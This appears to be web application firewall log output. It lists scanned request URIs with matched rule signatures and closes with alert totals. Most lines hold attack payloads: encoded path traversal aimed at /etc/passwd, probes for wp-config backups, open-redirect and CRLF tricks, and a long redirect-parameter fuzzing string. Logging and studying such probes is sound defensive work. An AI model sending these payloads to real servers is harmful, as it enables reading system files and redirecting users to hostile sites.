Packet [889]	Uri [/web/wp-config.php.orig]	Nattacks [1 ]	Signatures	[930130]
Packet [890]	Uri [/web////example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [891]	Uri [/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com]	Nattacks [4 ]	Signatures	[920272]	[931130]	[942431]	[942460]
Packet [893]	Uri [/web/wp-config.php.original]	Nattacks [1 ]	Signatures	[930130]
Packet [895]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [896]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [897]	Uri [/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com]	Nattacks [4 ]	Signatures	[920272]	[931130]	[942431]	[942460]
Packet [899]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [3 ]	Signatures	[920272]	[931130]	[942460]
Packet [900]	Uri [/web////http://192.168.1.104example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [901]	Uri [/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [902]	Uri [/web/static/..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [903]	Uri [/web/static/..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [904]	Uri [/web/static/..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [905]	Uri [/web/static/..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [906]	Uri [/web/static/..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [907]	Uri [/web/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [908]	Uri [/web/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [909]	Uri [/web/./../../../../../../../../../../etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [911]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [3 ]	Signatures	[920272]	[931130]	[942460]
Packet [912]	Uri [/web////http://192.168.1.104example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [913]	Uri [/web///;@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [914]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [3 ]	Signatures	[920272]	[931130]	[942460]
Packet [916]	Uri [/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [917]	Uri [/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd]	Nattacks [1 ]	Signatures	[930110]
Packet [918]	Uri [/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd]	Nattacks [1 ]	Signatures	[930100]
Packet [919]	Uri [/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd]	Nattacks [2 ]	Signatures	[920272]	[930100]
Packet [920]	Uri [/web///;@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [921]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [922]	Uri [/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com]	Nattacks [3 ]	Signatures	[920272]	[931130]	[942460]
Packet [924]	Uri [/web///%5C@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [925]	Uri [/web///%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [926]	Uri [/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [927]	Uri [/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [928]	Uri [/web///%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [930]	Uri [/web///example.com/%2F..]	Nattacks [1 ]	Signatures	[930110]
Packet [931]	Uri [/web///example.com/%2F..]	Nattacks [1 ]	Signatures	[930110]
Packet [936]	Uri [/web//%3C%3E//example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [938]	Uri [/web//%5C/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [939]	Uri [/web//%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [940]	Uri [/web//example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [941]	Uri [/web//example.com/%2F..]	Nattacks [1 ]	Signatures	[930110]
Packet [943]	Uri [/web//example.com/..;/css]	Nattacks [1 ]	Signatures	[930110]
Packet [944]	Uri [/web//https:example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [947]	Uri [/web//%E3%80%B1example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [948]	Uri [/web//%E3%80%B5example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [949]	Uri [/web//%E3%82%9Dexample.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [950]	Uri [/web//%E3%83%BCexample.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [951]	Uri [/web//%E3%83%BCexample.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [952]	Uri [/web//%EF%BD%B0example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [953]	Uri [/web/%3C%3E//example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [954]	Uri [/web/%3C%3E//example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [955]	Uri [/web/@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [956]	Uri [/web/@https://example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [959]	Uri [/web/example%E3%80%82com]	Nattacks [1 ]	Signatures	[920272]
Packet [960]	Uri [/web/example%E3%80%82com]	Nattacks [1 ]	Signatures	[920272]
Packet [961]	Uri [/web/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [962]	Uri [/web/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [970]	Uri [/web/https:%0a%0dexample.com]	Nattacks [3 ]	Signatures	[921190]	[920440]	[920272]
Packet [971]	Uri [/web/https://%0a%0dexample.com]	Nattacks [3 ]	Signatures	[921190]	[920440]	[920272]
Packet [972]	Uri [/web/https://%0a%0dexample.com]	Nattacks [3 ]	Signatures	[921190]	[920440]	[920272]
Packet [973]	Uri [/web/https://%09/example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [981]	Uri [/web/https://.example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [982]	Uri [/web/https://////example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [983]	Uri [/web/https://////example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [984]	Uri [/web/https:///example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [985]	Uri [/web/https:///example.com/%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [986]	Uri [/web/https:///example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [987]	Uri [/web/https:///example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [988]	Uri [/web/https:///example.com@example.com/%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [989]	Uri [/web/https:///example.com@example.com/%2f%2e%2e]	Nattacks [1 ]	Signatures	[930110]
Packet [992]	Uri [/web/https://:@%5C@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [993]	Uri [/web/https://:@example.com%5C@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [994]	Uri [/web/https://:@example.com%5C@WillBeReplaced.com]	Nattacks [1 ]	Signatures	[920440]
Packet [995]	Uri [/web/https://;@example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [997]	Uri [/web/https://example.com/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [999]	Uri [/web/https://www.%5C.example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1000]	Uri [/web/https:/%5C/%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1001]	Uri [/web/https:/%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1002]	Uri [/web/https:/%5Cexample.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1003]	Uri [/web/https:/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1004]	Uri [/web/https:/example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1005]	Uri [/web/https:example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1006]	Uri [/web/http://192.168.1.104example.com]	Nattacks [1 ]	Signatures	[920440]
Packet [1007]	Uri [/web/%E3%80%B1example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [1008]	Uri [/web/%E3%80%B5example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [1009]	Uri [/web/%E3%82%9Dexample.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [1010]	Uri [/web/%E3%83%BCexample.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [1011]	Uri [/web/%EF%BD%B0example.com]	Nattacks [2 ]	Signatures	[920440]	[920272]
Packet [1012]	Uri [/web/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com]	Nattacks [1 ]	Signatures	[921180]
# N. packets [1012], [520] with alerts, N. Alerts [1787]
